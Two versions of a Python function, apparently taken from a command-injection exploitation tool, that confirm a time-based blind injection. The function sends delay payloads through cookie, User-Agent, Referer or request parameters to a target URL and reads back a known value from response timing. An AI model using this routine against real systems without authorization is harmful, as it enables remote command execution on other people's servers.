Example #1
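def false_positive_check(separator, TAG, cmd, prefix, suffix, delay,
                         http_request_method, url, vuln_parameter, randvcalc,
                         alter_shell):
    """Re-check a timing-based result by reading back a known value.

    The check runs in two phases, each driven purely by response time:

    1. Probe ``output_length`` in ``range(1, 3)`` until one request takes at
       least ``delay`` seconds.
    2. For every position up to that length, probe ``ascii_char`` in
       ``range(1, 3)`` and keep the first value whose request is delayed.

    The collected values are joined into a string and compared with
    ``str(randvcalc)``. A run issues at most 2 + 2 * 2 = 6 requests.

    NOTE(review): every decision rests on a single ``how_long >= delay``
    sample, so one slow response caused by network or server load is
    indistinguishable from a genuine delay here. The final comparison with
    ``randvcalc`` is the only guard against that noise.

    Args:
        separator: Passed through to the ``tb_payloads`` builders.
        TAG: Not used by this function; kept for caller compatibility.
        cmd: Passed through to the ``tb_payloads`` builders.
        prefix: Applied to each payload via ``parameters.prefixes``.
        suffix: Applied to each payload via ``parameters.suffixes``.
        delay: Threshold, in the unit returned by the request helpers, at or
            above which a response counts as delayed.
        http_request_method: Passed to the builders and ``examine_requests``.
        url: Target URL handed to the request helpers.
        vuln_parameter: Parameter name handed to the request helpers.
        randvcalc: Expected value; compared as ``str(randvcalc)``.
        alter_shell: Selects the ``*_alter_shell`` payload builders.

    Returns:
        The recovered string when it equals ``str(randvcalc)``, else ``None``
        (also ``None`` when no length probe was delayed).
    """

    def _send_and_time(payload):
        # One place for wrap -> log -> send, so both phases stay in sync.
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)

        # Only "\n" is escaped before the payload is echoed to the terminal.
        if menu.options.verbose:
            sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " +
                             payload.replace("\n", "\\n") + Style.RESET_ALL)

        # The first header option carrying the injection tag wins; otherwise
        # the payload goes through the regular request path.
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
            return cookie_injection_test(url, vuln_parameter, payload)
        if menu.options.agent and settings.INJECT_TAG in menu.options.agent:
            return user_agent_injection_test(url, vuln_parameter, payload)
        if menu.options.referer and settings.INJECT_TAG in menu.options.referer:
            return referer_injection_test(url, vuln_parameter, payload)
        return examine_requests(payload, vuln_parameter,
                                http_request_method, url)

    if menu.options.verbose:
        sys.stdout.write("\n(*) Testing the reliability of used payload... ")
        sys.stdout.flush()

    # Phase 1: find a length whose probe is answered late.
    # presumably the builder delays only when the output length matches;
    # the tb_payloads implementation is not visible here.
    if alter_shell:
        build_length_probe = tb_payloads.cmd_execution_alter_shell
    else:
        build_length_probe = tb_payloads.cmd_execution

    for output_length in range(1, 3):
        payload = build_length_probe(separator, cmd, output_length, delay,
                                     http_request_method)
        if _send_and_time(payload) >= delay:
            break
    else:
        # No probe was delayed: nothing to read back.
        return None

    # Phase 2: recover one value per position, first delayed candidate wins.
    if alter_shell:
        build_char_probe = tb_payloads.fp_result_alter_shell
    else:
        build_char_probe = tb_payloads.fp_result

    sys.stdout.flush()
    output = []
    for position in range(1, output_length + 1):
        for ascii_char in range(1, 3):
            payload = build_char_probe(separator, cmd, position, ascii_char,
                                       delay, http_request_method)
            if _send_and_time(payload) >= delay:
                output.append(ascii_char)
                break

    output = "".join(str(p) for p in output)

    # Accept the result only when it reproduces the expected value.
    if output == str(randvcalc):
        return output
    return None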


#eof
Example #2
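def false_positive_check(separator, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, randvcalc, alter_shell):
  """Re-check a timing-based result by reading back a known value.

  Phase 1 probes ``output_length`` in ``range(1, 3)`` until a request takes
  at least ``delay``. Phase 2 then probes ``ascii_char`` in ``range(1, 3)``
  for each position up to that length and keeps the first delayed value.
  The joined values are compared with ``str(randvcalc)``.

  NOTE(review): each decision uses a single ``how_long >= delay`` sample,
  so an unrelated slow response looks the same as a genuine delay; only the
  final comparison with ``randvcalc`` filters such noise.

  Args:
    separator, cmd: Passed through to the ``tb_payloads`` builders.
    TAG: Not used by this function; kept for caller compatibility.
    prefix, suffix: Applied via ``parameters.prefixes`` / ``suffixes``.
    delay: Threshold at or above which a response counts as delayed.
    http_request_method: Passed to the builders and ``examine_requests``.
    url, vuln_parameter: Handed to the request helpers.
    randvcalc: Expected value; compared as ``str(randvcalc)``.
    alter_shell: Selects the ``*_alter_shell`` payload builders.

  Returns:
    The recovered string when it equals ``str(randvcalc)``, else ``None``
    (also ``None`` when no length probe was delayed).
  """

  def _send_and_time(payload):
    # Shared wrap -> log -> send step used by both phases.
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)

    # Only "\n" is escaped before the payload is echoed to the terminal.
    if menu.options.verbose:
      sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL)

    # A cookie option carrying the injection tag takes the cookie path;
    # everything else goes through the regular request path.
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
      return cookie_injection_test(url, vuln_parameter, payload)
    return examine_requests(payload, vuln_parameter, http_request_method, url)

  if menu.options.verbose:
    sys.stdout.write("\n(*) Testing the reliability of used payload... ")
    sys.stdout.flush()

  # Phase 1: find a length whose probe is answered late.
  # presumably the builder delays only when the output length matches;
  # the tb_payloads implementation is not visible here.
  build_length_probe = tb_payloads.cmd_execution_alter_shell if alter_shell else tb_payloads.cmd_execution

  for output_length in range(1, 3):
    payload = build_length_probe(separator, cmd, output_length, delay, http_request_method)
    if _send_and_time(payload) >= delay:
      break
  else:
    # No probe was delayed: nothing to read back.
    return None

  # Phase 2: recover one value per position, first delayed candidate wins.
  build_char_probe = tb_payloads.fp_result_alter_shell if alter_shell else tb_payloads.fp_result

  sys.stdout.flush()
  output = []
  for position in range(1, output_length + 1):
    for ascii_char in range(1, 3):
      payload = build_char_probe(separator, cmd, position, ascii_char, delay, http_request_method)
      if _send_and_time(payload) >= delay:
        output.append(ascii_char)
        break

  output = "".join(str(p) for p in output)

  # Accept the result only when it reproduces the expected value.
  if output == str(randvcalc):
    return output
  return None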
      
#eof